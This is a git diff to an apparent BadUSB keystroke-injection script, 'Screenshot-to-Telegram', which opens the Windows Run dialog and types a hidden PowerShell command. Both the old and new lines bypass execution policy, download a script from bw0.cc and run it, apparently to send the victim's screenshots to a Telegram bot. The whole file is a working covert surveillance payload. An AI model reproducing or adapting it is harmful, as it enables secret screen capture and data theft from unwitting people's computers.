diff --git a/Screen-to-Telegram/Screenshot-to-Telegram.txt b/Screen-to-Telegram/Screenshot-to-Telegram.txt index 880e13f..2e590c1 100644 --- a/Screen-to-Telegram/Screenshot-to-Telegram.txt +++ b/Screen-to-Telegram/Screenshot-to-Telegram.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://bw0.cc/tgscr | iex +STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr) ENTER